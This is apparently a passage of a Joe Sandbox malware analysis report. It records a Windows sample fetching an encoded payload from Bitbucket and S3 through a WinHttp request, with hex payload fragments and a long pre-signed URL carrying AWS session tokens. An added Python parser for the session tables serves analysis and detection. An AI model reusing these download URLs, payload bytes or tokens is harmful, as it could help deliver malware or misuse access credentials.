                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX [TRUNCATED]
                                                                                                                                        Expires: Wed, 23 Oct 2024 05:02:16 GMT
                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                        X-Used-Mesh: False
                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                        Content-Language: en
                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                        X-Served-By: b98c7a43676b
                                                                                                                                        X-Version: 4bc3453affe5
                                                                                                                                        X-Static-Version: 4bc3453affe5
                                                                                                                                        X-Request-Count: 2489
                                                                                                                                        X-Render-Time: 0.07113289833068848
                                                                                                                                        X-B3-Traceid: af4677fd16334c56882315d9be66852c
                                                                                                                                        X-B3-Spanid: 35e1c29ecbdedee4
                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                        Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com xp.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend [TRUNCATED]
                                                                                                                                        X-Usage-Quota-Remaining: 998551.793
                                                                                                                                        X-Usage-Request-Cost: 1034.67
                                                                                                                                        X-Usage-User-Time: 0.030719
                                                                                                                                        X-Usage-System-Time: 0.000321
                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                        Age: 0
                                                                                                                                        X-Cache: MISS
                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                        Atl-Traceid: af4677fd16334c56882315d9be66852c
                                                                                                                                        Atl-Request-Id: af4677fd-1633-4c56-8823-15d9be66852c
                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                        Server-Timing: atl-edge;dur=179,atl-edge-internal;dur=3,atl-edge-upstream;dur=178,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                        Connection: close

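The session tables in this report are flattened (timestamp, byte count, direction and data run together in one cell), so the HTTP indicators of the exchange above (the loader's GET to bitbucket.org with a WinHttp.WinHttpRequest.5 User-Agent, answered by a 302 to bbuseruploads.s3.amazonaws.com) and of the S3 download that follows in session 5 are awkward to pull out by hand. Below is an added example, not part of the Joe Sandbox report and not code from the sample, that parses such a session table into request line, headers, status line and reassembled body, returns the redirect Location, flags the WinHttp User-Agent, and compares the reassembled body with Content-Length and the S3 ETag. The row regex, the function names and the sample rows are this example's own; the sample rows are constructed in the report's row format with a made-up body, not the real payload.

```python
# Parse one Joe Sandbox network-session table (added example, not the report's own code).
import hashlib
import re
from dataclasses import dataclass, field

# One flattened row: "<timestamp> UTC<bytes transferred><IN|OUT><data>"; the digit run stops at IN/OUT.
ROW_RE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d UTC)(\d+)(IN|OUT)(.*)$")
WINHTTP_UA = "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"


@dataclass
class Exchange:
    request_line: str = ""
    request_headers: dict = field(default_factory=dict)
    status_line: str = ""
    response_headers: dict = field(default_factory=dict)
    declared_in_bytes: int = 0   # sum of "Bytes transferred" over IN data rows
    body: bytes = b""            # bytes recoverable from the "Data Raw" rows


def parse_session(lines):
    """Turn the rows of one session table into an Exchange."""
    ex = Exchange()
    target = None  # header dict that the following continuation lines belong to
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            _ts, nbytes, direction, data = m.groups()
            if data.startswith("Data Raw:"):
                ex.body += bytes.fromhex(data[len("Data Raw:"):].replace(" ", ""))
                if direction == "IN":
                    ex.declared_in_bytes += int(nbytes)
                target = None
            elif direction == "OUT":
                ex.request_line, target = data, ex.request_headers
            else:
                ex.status_line, target = data, ex.response_headers
            continue
        if line.startswith("Data Ascii:") or target is None:
            continue  # the ASCII view repeats Data Raw; nothing new in it
        name, _, value = line.partition(":")
        target[name.strip().lower()] = value.strip()
    return ex


def redirect_target(ex):
    """Location header of a 3xx response, else None."""
    parts = ex.status_line.split()
    if len(parts) >= 2 and parts[1].startswith("3"):
        return ex.response_headers.get("location")
    return None


def check_etag(ex):
    """Return (body_complete, md5_matches_etag).

    Joe Sandbox prints only the first bytes of each data chunk, so the digest is
    None unless the reassembled body is exactly Content-Length long. The S3 ETag
    is the object's MD5 only for single-part uploads that are plaintext or SSE-S3
    (AES256, as in this report); multipart ("-" in ETag), SSE-KMS and SSE-C
    objects carry other ETags, so those also yield None rather than a mismatch.
    """
    declared = int(ex.response_headers.get("content-length", "0"))
    if declared == 0 or len(ex.body) != declared:
        return False, None
    etag = ex.response_headers.get("etag", "").strip('"').lower()
    sse = ex.response_headers.get("x-amz-server-side-encryption", "AES256")
    if "-" in etag or sse != "AES256":
        return True, None
    return True, hashlib.md5(ex.body).hexdigest() == etag


def summarize(lines):
    ex = parse_session(lines)
    return {
        "host": ex.request_headers.get("host", ""),
        "winhttp_ua": ex.request_headers.get("user-agent", "") == WINHTTP_UA,
        "redirect": redirect_target(ex),
        "etag_check": check_etag(ex),
    }


# Constructed rows in the report's format, shaped like session 4 above (bitbucket.org 302).
SAMPLE_REDIRECT = [
    "2024-10-23 05:02:16 UTC187OUTGET /akeem4u/canter/downloads/233_Ltspwqrtysw HTTP/1.1",
    "User-Agent: " + WINHTTP_UA,
    "Host: bitbucket.org",
    "2024-10-23 05:02:16 UTC5172INHTTP/1.1 302 Found",
    "Content-Length: 0",
    "Location: https://bbuseruploads.s3.amazonaws.com/example/downloads/233_Ltspwqrtysw?sig=x",
]
# Constructed rows shaped like session 5 (the S3 200) with a made-up 2048-byte body.
SAMPLE_BODY = bytes(range(256)) * 8
SAMPLE_DOWNLOAD = [
    "2024-10-23 05:02:17 UTC1295OUTGET /example/downloads/233_Ltspwqrtysw?sig=x HTTP/1.1",
    "User-Agent: " + WINHTTP_UA,
    "Host: bbuseruploads.s3.amazonaws.com",
    "2024-10-23 05:02:17 UTC544INHTTP/1.1 200 OK",
    'ETag: "%s"' % hashlib.md5(SAMPLE_BODY).hexdigest(),
    "x-amz-server-side-encryption: AES256",
    "Content-Length: %d" % len(SAMPLE_BODY),
    "2024-10-23 05:02:17 UTC1024INData Raw: " + SAMPLE_BODY[:1024].hex(" "),
    "Data Ascii: (omitted)",
    "2024-10-23 05:02:17 UTC1024INData Raw: " + SAMPLE_BODY[1024:].hex(" "),
]
```

On the report's own rows the ETag check will come back as (False, None), because the printed chunks are prefixes of the 16384-byte transfers; the MD5 comparison only becomes meaningful on a body carved from the full pcap. Summing `declared_in_bytes` against Content-Length (383200 for the 233_Ltspwqrtysw object) is the check that does work on the report text alone.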

Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID  | Process
5          | 192.168.2.7 | 49713       | 54.231.236.129 | 443              | 6452 | C:\Users\user\Desktop\z10982283782.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-23 05:02:17 UTC | 1295 | OUT | GET /1889f89b-bf3e-4330-a7ab-fccb77ce4890/downloads/a122b37b-2be1-4956-a228-3e44b96626b8/233_Ltspwqrtysw?response-content-disposition=attachment%3B%20filename%3D%22233_Ltspwqrtysw%22&AWSAccessKeyId=ASIA6KOSE3BNA3TNBD6S&Signature=bquajkbDUnHiY6Qk9cEyy3Ji0xM%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEE0aCXVzLWVhc3QtMSJIMEYCIQDWLdnMpGGZVnfuf5mZ7tkLhGS%2BHN%2Fi5hrbwc5K5HeekAIhALFcc1ROzTR8B4kcaA2oVW3sq0zTC7bxDYRYDuyXyj6sKrACCLb%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgyNe%2FRStUblqwXyTbkqhAK8BQ1NlXfF77BQxUe%2BLDGJ72hzvISSyyG1nPahXGTPb9H%2F4F2%2F5GlsBuXRyGcOQkj4ERRXbeHiahdKc%2BywbR6YEWoYOH14NAUuJivTj9fBN6WDk7UmQ8nnk5IxunnOohsVHIhsiRtMzjGYE3m%2BT3Nv%2B2LBuAC5kTgwrpgGcGd3z79%2FubqvQWKpCPk5OQo1tvOyZDdGiaMdoJrU%2F%2B%2F6PyCU39h28LMR4%2BdAAh6%2FYzNlkOlxzs7Ih0fOSFaTs1BSOSRuTvP9GixHrOn3THgqHyMm8F1oMbov2tlWw%2BCDNj5ns8S8xb%2BGRMfWJz69PjosPmJKRQvcpZYEVJ%2Fuao%2BBg6rxNrk1bzCkhuK4BjqcAeGCMiJnZekyMuhm2XJ%2FmPZHGuv1mMGkMdY36AKfCoyDFZlLRnUelBbsByQxcf9NuZCZIj5sRzg6N9aafMqZIWX0TejNIhed6dqnVS8HwylTQKvAyrfpMWEXQYcoRuCgC5H [TRUNCATED]
                                                                                                                                        Connection: Keep-Alive
                                                                                                                                        Accept: */*
                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
2024-10-23 05:02:17 UTC | 544 | IN | HTTP/1.1 200 OK
                                                                                                                                        x-amz-id-2: CvC/J79JTF6bW3cM79iISTaFOLeJJiBd7lPPlUvocEdnfTur0Odx55NchTQPo58v2SQI1Uy7ktQ=
                                                                                                                                        x-amz-request-id: T5R1QSZTA91PBE10
                                                                                                                                        Date: Wed, 23 Oct 2024 05:02:18 GMT
                                                                                                                                        Last-Modified: Tue, 22 Oct 2024 05:16:04 GMT
                                                                                                                                        ETag: "5d7ab335987101c49bbbe6ebcea19843"
                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                        x-amz-version-id: aV2sZzfG3ESjVStuXavykQrQq1UCdUQQ
                                                                                                                                        Content-Disposition: attachment; filename="233_Ltspwqrtysw"
                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                        Server: AmazonS3
                                                                                                                                        Content-Length: 383200
                                                                                                                                        Connection: close
                                                                                                                                        2024-10-23 05:02:17 UTC1413INData Raw: 70 71 36 6c 57 53 4f 6e 73 55 73 52 47 41 34 57 47 79 55 65 46 78 55 58 46 53 55 53 4a 42 77 69 47 79 49 53 4a 69 4d 50 4a 79 63 52 46 52 4d 52 48 69 51 6a 47 68 55 57 49 51 38 5a 4a 52 51 52 49 78 45 65 47 68 77 6c 47 68 55 59 47 52 51 56 70 71 36 6c 57 53 4f 6e 73 55 74 58 49 53 41 64 4a 42 34 66 49 53 59 67 4a 4b 61 75 70 56 6b 6a 70 37 46 4c 61 46 39 6c 58 57 4a 73 64 56 35 63 58 6c 78 73 61 58 74 6a 65 57 4a 35 61 57 31 36 5a 6d 35 75 61 46 78 71 61 48 56 37 65 6d 46 63 58 58 68 6d 59 47 78 72 61 48 70 6f 64 57 46 6a 62 47 46 63 58 32 42 72 58 47 68 66 5a 56 31 69 62 48 56 65 58 46 35 63 62 47 6c 37 59 33 6c 69 65 57 6c 74 65 6d 5a 75 62 6d 68 63 61 6d 68 31 65 33 70 68 58 46 31 34 5a 6d 42 73 61 32 68 36 61 48 56 68 59 32 78 68 58 46 39 67 61 31 78
                                                                                                                                        Data Ascii: pq6lWSOnsUsRGA4WGyUeFxUXFSUSJBwiGyISJiMPJycRFRMRHiQjGhUWIQ8ZJRQRIxEeGhwlGhUYGRQVpq6lWSOnsUtXISAdJB4fISYgJKaupVkjp7FLaF9lXWJsdV5cXlxsaXtjeWJ5aW16Zm5uaFxqaHV7emFcXXhmYGxraHpodWFjbGFcX2BrXGhfZV1ibHVeXF5cbGl7Y3lieWltemZubmhcamh1e3phXF14ZmBsa2h6aHVhY2xhXF9ga1x
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 56 75 62 42 41 56 4a 30 68 74 70 64 7a 50 32 75 67 4d 65 51 71 69 71 44 74 41 57 78 52 73 65 57 41 4b 39 42 6e 66 50 4e 2f 63 67 53 41 64 6d 32 35 6d 51 37 70 35 37 59 2f 43 44 6b 4e 2b 4b 58 36 41 53 76 45 68 35 72 67 72 6b 62 79 67 6d 48 5a 34 63 45 53 68 37 47 66 62 76 35 31 63 48 38 41 70 62 39 5a 68 47 71 66 71 38 73 70 61 46 4c 6a 71 59 72 5a 55 50 41 74 66 74 4e 44 74 49 75 67 65 6a 30 79 73 77 38 6e 75 51 6d 59 43 6a 61 6b 6c 51 59 55 42 6c 59 6c 68 32 32 5a 68 36 70 77 4f 6d 56 32 4c 68 69 4d 38 35 7a 72 6a 4a 31 53 58 62 6a 67 56 48 4f 31 4a 36 51 4b 4f 55 4e 2f 54 7a 6e 79 73 4d 4c 61 6a 45 72 37 71 47 41 39 56 71 7a 46 75 58 76 7a 2b 50 63 67 78 63 4e 65 58 53 65 59 4f 53 72 63 78 77 55 4f 70 2f 68 69 6a 35 41 2b 75 6e 79 68 4f 72 47 38 63 78
                                                                                                                                        Data Ascii: VubBAVJ0htpdzP2ugMeQqiqDtAWxRseWAK9BnfPN/cgSAdm25mQ7p57Y/CDkN+KX6ASvEh5rgrkbygmHZ4cESh7Gfbv51cH8Apb9ZhGqfq8spaFLjqYrZUPAtftNDtIugej0ysw8nuQmYCjaklQYUBlYlh22Zh6pwOmV2LhiM85zrjJ1SXbjgVHO1J6QKOUN/TznysMLajEr7qGA9VqzFuXvz+PcgxcNeXSeYOSrcxwUOp/hij5A+unyhOrG8cx
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 74 51 69 69 38 79 44 69 2b 6d 61 74 55 37 42 73 5a 61 4a 4b 61 51 57 2b 2b 32 48 5a 41 49 30 61 31 65 56 56 77 4b 63 4c 75 7a 4b 67 6e 37 55 57 65 78 6d 5a 75 77 36 31 73 73 64 30 54 45 58 49 62 42 2b 34 56 4e 42 31 63 77 48 6d 66 30 44 4a 6f 53 33 6f 4e 4c 77 4d 36 6f 6e 71 61 75 59 6d 62 76 65 44 36 64 64 50 69 36 69 61 68 43 59 68 79 65 39 4b 64 56 78 61 42 50 43 78 6c 35 6f 61 42 39 4c 4f 73 37 43 66 59 65 34 62 79 6f 37 43 47 66 6b 76 47 75 79 30 4f 34 4c 6e 70 4a 6d 52 78 4a 59 4b 79 63 63 56 39 62 69 72 50 55 38 51 67 49 57 57 4c 6c 49 6e 65 44 30 69 74 59 50 34 4c 59 33 4c 4f 59 2b 72 64 2f 51 63 73 72 34 4b 37 6a 6d 44 74 57 35 37 75 68 74 45 62 58 30 30 41 38 77 35 30 76 6c 64 6b 4d 31 73 56 55 57 56 72 70 6c 36 67 4f 42 74 6c 4b 59 57 71 2b 79
                                                                                                                                        Data Ascii: tQii8yDi+matU7BsZaJKaQW++2HZAI0a1eVVwKcLuzKgn7UWexmZuw61ssd0TEXIbB+4VNB1cwHmf0DJoS3oNLwM6onqauYmbveD6ddPi6iahCYhye9KdVxaBPCxl5oaB9LOs7CfYe4byo7CGfkvGuy0O4LnpJmRxJYKyccV9birPU8QgIWWLlIneD0itYP4LY3LOY+rd/Qcsr4K7jmDtW57uhtEbX00A8w50vldkM1sVUWVrpl6gOBtlKYWq+y
                                                                                                                                        2024-10-23 05:02:17 UTC15360INData Raw: 65 65 79 61 6a 30 57 68 6e 72 70 6b 42 44 4a 56 4d 70 37 34 4c 52 36 6f 63 73 4c 7a 7a 61 50 35 31 54 6e 74 4c 6e 46 76 32 2f 4a 36 4c 39 54 45 59 4f 4c 4e 43 64 54 64 7a 7a 66 50 50 4e 6a 58 51 4e 64 33 69 69 43 4e 43 6b 62 73 4f 50 36 77 42 31 57 45 55 75 36 61 67 36 31 57 31 4c 52 50 6b 35 53 34 37 57 47 6d 51 66 4f 63 62 52 76 30 58 42 36 4e 52 57 68 72 52 69 32 78 61 30 4a 69 66 6e 6e 6b 75 6e 58 6b 41 59 52 4e 71 73 61 4d 6e 4c 36 57 46 51 37 70 38 37 32 46 61 69 50 50 48 61 62 4f 74 79 71 30 69 79 67 54 44 56 66 41 41 63 51 4f 45 66 75 47 72 46 54 31 75 4c 32 76 5a 59 73 31 42 63 39 45 61 70 70 4e 6d 36 66 39 37 52 6a 43 35 54 48 72 53 30 72 70 6e 75 4e 74 6d 69 65 64 47 2f 6d 35 6b 6f 70 33 44 74 57 4b 56 34 61 38 2b 73 78 47 71 7a 72 4a 73 7a 77
                                                                                                                                        Data Ascii: eeyaj0WhnrpkBDJVMp74LR6ocsLzzaP51TntLnFv2/J6L9TEYOLNCdTdzzfPPNjXQNd3iiCNCkbsOP6wB1WEUu6ag61W1LRPk5S47WGmQfOcbRv0XB6NRWhrRi2xa0JifnnkunXkAYRNqsaMnL6WFQ7p872FaiPPHabOtyq0iygTDVfAAcQOEfuGrFT1uL2vZYs1Bc9EappNm6f97RjC5THrS0rpnuNtmiedG/m5kop3DtWKV4a8+sxGqzrJszw
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 38 65 41 44 72 69 4d 41 52 43 4c 4f 5a 54 6a 68 77 36 6e 6d 4f 77 59 34 6b 76 6a 44 51 6e 75 32 35 4b 68 75 6d 67 62 58 32 71 50 52 39 35 62 34 6c 62 32 38 62 71 30 47 50 45 45 34 31 78 5a 45 4c 31 58 69 43 39 36 69 5a 67 77 59 46 34 54 64 36 54 61 33 76 70 41 66 69 6a 30 4a 54 36 33 75 6c 5a 4f 47 42 71 42 63 38 35 7a 6d 6a 39 57 53 65 4d 54 4e 34 36 47 47 6a 44 4f 48 69 54 61 42 38 33 59 5a 72 37 39 61 66 62 45 66 74 42 51 71 64 6e 4c 75 55 47 64 78 6b 4b 47 59 30 43 2b 4f 37 4a 65 58 4d 69 6f 58 72 39 44 76 6e 42 78 4e 74 32 6e 79 72 46 42 58 68 2f 76 55 4f 55 2b 6f 73 64 4b 73 58 45 43 49 32 6e 69 42 64 38 47 46 35 75 6d 6b 6b 50 6d 48 68 73 48 72 51 6c 59 53 6b 59 76 76 5a 78 34 41 53 2f 68 4f 77 77 56 6b 78 34 46 6a 44 46 52 70 61 67 58 36 53 69 45
                                                                                                                                        Data Ascii: 8eADriMARCLOZTjhw6nmOwY4kvjDQnu25KhumgbX2qPR95b4lb28bq0GPEE41xZEL1XiC96iZgwYF4Td6Ta3vpAfij0JT63ulZOGBqBc85zmj9WSeMTN46GGjDOHiTaB83YZr79afbEftBQqdnLuUGdxkKGY0C+O7JeXMioXr9DvnBxNt2nyrFBXh/vUOU+osdKsXECI2niBd8GF5umkkPmHhsHrQlYSkYvvZx4AS/hOwwVkx4FjDFRpagX6SiE
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 59 4d 58 70 67 44 64 66 6a 4b 68 73 42 63 43 4d 6c 52 54 69 2f 64 63 4b 78 51 2b 69 52 4d 69 2b 4f 2b 68 76 69 4e 73 58 36 6d 4c 69 51 52 33 65 31 59 2b 58 6c 48 4c 65 6e 57 70 52 44 37 42 35 45 61 5a 4c 39 53 2b 4b 47 4f 7a 43 7a 61 34 79 37 64 71 34 33 5a 68 58 48 4c 66 57 4c 71 41 39 48 56 73 76 43 4e 56 46 75 71 43 71 53 2b 64 49 50 37 49 53 46 63 50 4c 42 33 65 43 6b 54 6c 32 5a 47 61 73 53 6b 69 64 62 62 54 7a 44 59 42 71 65 78 51 50 4c 4a 73 4b 4c 4a 36 6c 77 78 55 62 6d 6b 6c 54 55 35 55 30 4a 63 44 42 6f 6d 33 7a 78 41 72 49 42 47 76 73 47 46 2f 7a 44 75 4b 4e 61 33 6c 6b 42 37 2b 6f 68 52 69 63 4b 7a 32 6e 39 6d 5a 72 77 61 42 71 39 72 74 33 66 38 56 52 4f 31 6c 62 30 2f 4c 38 62 42 4b 42 4f 2f 63 30 55 68 78 64 56 58 50 39 39 6e 48 34 70 4e 48
                                                                                                                                        Data Ascii: YMXpgDdfjKhsBcCMlRTi/dcKxQ+iRMi+O+hviNsX6mLiQR3e1Y+XlHLenWpRD7B5EaZL9S+KGOzCza4y7dq43ZhXHLfWLqA9HVsvCNVFuqCqS+dIP7ISFcPLB3eCkTl2ZGasSkidbbTzDYBqexQPLJsKLJ6lwxUbmklTU5U0JcDBom3zxArIBGvsGF/zDuKNa3lkB7+ohRicKz2n9mZrwaBq9rt3f8VRO1lb0/L8bBKBO/c0UhxdVXP99nH4pNH
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 76 37 75 4e 68 45 61 4a 66 49 32 76 51 32 4e 49 45 64 38 69 4c 4b 2b 4e 56 32 75 63 45 75 5a 6f 6d 6a 57 32 55 45 41 37 67 2b 47 36 61 6f 6b 6b 66 4c 57 69 32 61 30 33 2f 4b 32 6b 43 4e 76 54 63 64 66 51 72 4d 56 6a 68 56 62 67 65 50 6d 31 30 6c 48 66 35 53 52 53 4c 6f 67 73 4c 2f 43 2b 2f 52 46 47 79 7a 71 77 6a 78 7a 70 4f 55 46 41 37 58 54 4e 5a 48 30 57 79 4d 6e 48 55 67 7a 4c 31 5a 74 6a 6a 54 33 43 78 77 35 4e 68 75 67 64 71 62 6b 45 6d 6f 72 4c 31 4e 59 67 4f 45 4c 6f 44 61 34 39 33 6d 45 41 46 51 2b 42 5a 48 47 53 38 79 47 61 47 64 6e 67 36 54 4f 6b 7a 30 7a 61 37 51 63 37 34 63 53 73 2b 62 46 48 6f 50 64 64 74 58 63 75 73 5a 69 32 77 37 4e 4a 33 2b 4b 46 51 30 35 33 6d 54 54 4a 74 31 51 67 49 36 64 33 5a 65 6c 78 36 63 71 6e 7a 67 2b 6a 45 64 4e
                                                                                                                                        Data Ascii: v7uNhEaJfI2vQ2NIEd8iLK+NV2ucEuZomjW2UEA7g+G6aokkfLWi2a03/K2kCNvTcdfQrMVjhVbgePm10lHf5SRSLogsL/C+/RFGyzqwjxzpOUFA7XTNZH0WyMnHUgzL1ZtjjT3Cxw5NhugdqbkEmorL1NYgOELoDa493mEAFQ+BZHGS8yGaGdng6TOkz0za7Qc74cSs+bFHoPddtXcusZi2w7NJ3+KFQ053mTTJt1QgI6d3Zelx6cqnzg+jEdN
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 77 4b 54 67 4b 44 78 68 39 56 35 71 70 6d 61 67 6e 69 33 64 6c 72 66 75 76 6b 33 68 48 41 48 79 53 43 6a 6e 6b 2b 57 6c 46 63 36 67 66 66 32 62 70 64 48 37 58 6e 63 4d 55 38 54 43 53 48 54 6d 6c 65 78 4a 77 65 6a 67 38 55 72 61 4d 35 56 46 79 6c 33 35 67 62 75 37 56 6a 55 64 6d 43 5a 78 4e 34 6f 6a 38 42 4d 6d 42 52 66 31 50 59 56 2b 6b 79 4d 75 70 56 51 6d 49 46 48 46 33 71 54 57 6a 66 43 70 73 68 37 47 34 56 56 4c 59 72 47 42 36 2b 2f 6c 5a 71 38 37 4c 7a 2f 57 68 39 32 5a 34 56 52 43 50 75 32 54 56 6f 66 71 56 78 54 53 57 78 70 2b 53 38 77 61 7a 4c 2f 6d 39 46 4e 50 4a 52 44 79 4e 4a 50 31 5a 34 36 37 65 78 6f 51 71 74 4e 62 73 58 51 42 41 51 73 63 34 2f 67 72 46 53 30 75 55 37 79 53 54 6d 34 49 78 4e 48 35 74 2f 39 57 75 6c 6d 2b 36 2b 4c 53 6f 73 49
                                                                                                                                        Data Ascii: wKTgKDxh9V5qpmagni3dlrfuvk3hHAHySCjnk+WlFc6gff2bpdH7XncMU8TCSHTmlexJwejg8UraM5VFyl35gbu7VjUdmCZxN4oj8BMmBRf1PYV+kyMupVQmIFHF3qTWjfCpsh7G4VVLYrGB6+/lZq87Lz/Wh92Z4VRCPu2TVofqVxTSWxp+S8wazL/m9FNPJRDyNJP1Z467exoQqtNbsXQBAQsc4/grFS0uU7ySTm4IxNH5t/9Wulm+6+LSosI
                                                                                                                                        2024-10-23 05:02:17 UTC16384INData Raw: 32 2f 41 74 5a 52 54 76 4e 73 78 48 68 35 50 68 30 6a 6a 6f 53 43 61 36 6d 4d 4a 32 6b 2f 6f 6b 43 65 34 4c 54 55 58 42 54 6a 51 68 78 47 62 43 66 51 79 49 54 52 64 74 45 5a 69 51 71 6d 6a 38 2f 44 41 52 72 77 53 54 33 75 41 6c 41 74 76 46 57 54 79 6c 37 32 51 41 35 4b 31 56 74 48 63 45 53 34 6e 39 38 75 6d 50 30 56 6f 6d 65 74 4e 51 32 5a 31 6f 54 4a 77 58 44 62 6f 4f 2f 55 69 74 70 59 54 47 72 57 74 4e 37 76 6f 45 6d 54 41 6c 39 35 35 69 4c 57 6e 53 70 6b 43 41 4b 71 48 74 6d 79 4b 69 50 56 70 68 39 4f 69 76 6d 32 52 6e 62 79 38 47 45 62 37 70 4a 50 74 79 31 64 45 4a 31 4d 5a 4b 67 42 66 37 79 33 4c 34 38 32 6f 65 4b 38 70 75 5a 34 78 59 64 68 78 63 44 2f 54 62 30 57 37 6a 7a 32 64 6e 64 4a 6a 72 4b 6a 6c 4f 68 2b 43 2b 75 42 4b 44 70 7a 57 51 70 65 68
                                                                                                                                        Data Ascii: 2/AtZRTvNsxHh5Ph0jjoSCa6mMJ2k/okCe4LTUXBTjQhxGbCfQyITRdtEZiQqmj8/DARrwST3uAlAtvFWTyl72QA5K1VtHcES4n98umP0VometNQ2Z1oTJwXDboO/UitpYTGrWtN7voEmTAl955iLWnSpkCAKqHtmyKiPVph9Oivm2Rnby8GEb7pJPty1dEJ1MZKgBf7y3L482oeK8puZ4xYdhxcD/Tb0W7jz2dndJjrKjlOh+C+uBKDpzWQpeh
                                                                                                                                        2024-10-23 05:02:17 UTC1024INData Raw: 64 6f 57 53 32 62 58 43 51 34 2b 68 62 4d 6b 45 58 70 52 67 65 59 76 57 52 37 6a 62 37 45 6b 37 4a 58 7a 70 47 79 6c 74 6a 44 56 39 2b 35 74 4d 51 56 59 66 63 36 6f 45 79 36 72 76 76 47 36 4a 53 52 66 74 4f 66 58 58 32 31 63 59 78 79 39 35 51 6c 75 48 53 76 79 58 4f 70 53 6b 68 6c 6f 59 69 55 63 4b 62 48 62 35 47 2b 52 51 63 74 77 5a 49 39 4d 63 5a 78 7a 68 4e 45 49 41 44 70 4c 55 45 52 6f 68 31 6a 2f 53 2f 47 66 56 4c 77 4d 71 2b 2b 5a 48 74 51 4a 36 38 65 7a 77 47 55 74 78 48 43 6f 4e 4d 34 67 6a 42 67 43 4f 61 35 63 52 36 72 33 73 75 49 43 6c 4b 32 70 65 6f 75 42 50 50 70 69 44 63 34 66 56 7a 74 38 35 59 75 70 7a 58 64 6a 65 6a 6d 46 58 67 6b 63 71 66 30 45 46 4b 62 78 30 72 48 44 48 57 35 55 75 67 35 41 4c 31 5a 4b 7a 50 67 58 6a 67 2f 47 4c 38 71 52
